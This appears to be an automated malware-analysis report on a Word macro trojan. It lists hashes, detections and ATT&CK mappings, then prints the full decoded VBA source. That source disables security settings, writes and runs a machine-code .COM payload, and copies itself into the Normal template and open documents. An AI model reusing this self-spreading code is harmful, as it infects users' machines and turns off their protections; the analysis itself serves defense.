Win.Trojan.Psycho-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 ff62491714e19956…

MALICIOUS

Office (OLE)

Size: 29.5 KB
Created: 1999-09-02 15:12:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ed5e113b3640a2155fbf5bac5c6c7379
SHA-1: a36dd3a683930fbdd0dd0690f832f1d08e24bad1
SHA-256: ff62491714e199561a866b922eca6fdc59e9cad8ada06b1e678a4faccb77499e
Risk score: 140

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1564.004 Impair Defenses: Disable or Modify Tools

The sample contains VBA macros that attempt to disable security features and execute a file named 'C:\�.COM' using the Shell() function. This behavior is indicative of a trojan dropper. The ClamAV detection name 'Win.Trojan.Psycho-3' further supports this classification.

Heuristics (3)

  • ClamAV: Win.Trojan.Psycho-3 — severity: critical — rule: CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected — severity: medium — 1 related finding — rule: OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA — severity: critical — rule: OLE_VBA_SHELL
    The VBA code calls Shell() to execute an external program

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2465 bytes
SHA-256: 433d950e33c183dc9b1860eca460ebaea3e4b8c17cc3a52a1bb8c9dbbf07a142

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Spoony
Private Declare Function SystemParametersInfoA Lib "user32" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Sub Document_Close(): Dim ν As Byte
On Error Resume Next
υ = ActiveDocument.Saved
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Options.ConfirmConversions = 0
Application.EnableCancelKey = 0
SystemParametersInfoA 97, 1, "", 0
CustomizationContext = MacroContainer
CommandBars("Control Toolbox").Enabled = 0
CommandBars("Tools").Controls(12).Visible = 0
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

If Month(Now) Like Day(Now) Or Day(Now) Like WeekDay(Now) Then _
κ = Array(&HFA, &H33, &HC9, &H8B, &HD1, &HFE, &HC1, &H80, &HD6, &H0, &HA, &HC9, &H75, &H2, &HFE, &HC1, &HB2, &H80, &HB8, &H1, &H3, &H9A, &HEE, &H3, &H70, &H0, &HEB, &HE9): _
Open "C:\�.COM" For Binary As #1: For ι = 0 To 27: ν = κ(ι): Put #1, ι, ν: Next: Close: Shell "C:\�.COM", 0

If GetAttr(NormalTemplate.FullName) Mod 2 Then SetAttr NormalTemplate.FullName, 0
If GetSetting("'", "'", "'") Like "" Then SaveSetting "'", "'", "'", ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 50)

If GetAttr(NormalTemplate.FullName) Then
With NormalTemplate.VBProject
If Not .Protection And .HelpContextID <> 7 Then
.VBComponents(1).CodeModule.DeleteLines 1, .VBComponents(1).CodeModule.CountOfLines
.VBComponents(1).CodeModule.AddFromString GetSetting("'", "'", "'")
.HelpContextID = 7
End If: End With: End If

If Len(ActiveDocument.Path) Then
With ActiveDocument.VBProject
If Not .Protection And .HelpContextID <> 7 Then
.VBComponents(1).CodeModule.DeleteLines 1, .VBComponents(1).CodeModule.CountOfLines
.VBComponents(1).CodeModule.AddFromString GetSetting("'", "'", "'")
.HelpContextID = 7
If Not ActiveDocument.ReadOnly Then ActiveDocument.SaveAs ActiveDocument.FullName
End If: End With: End If

SystemParametersInfoA 97, 0, "", 0
ActiveDocument.Saved = υ
End Sub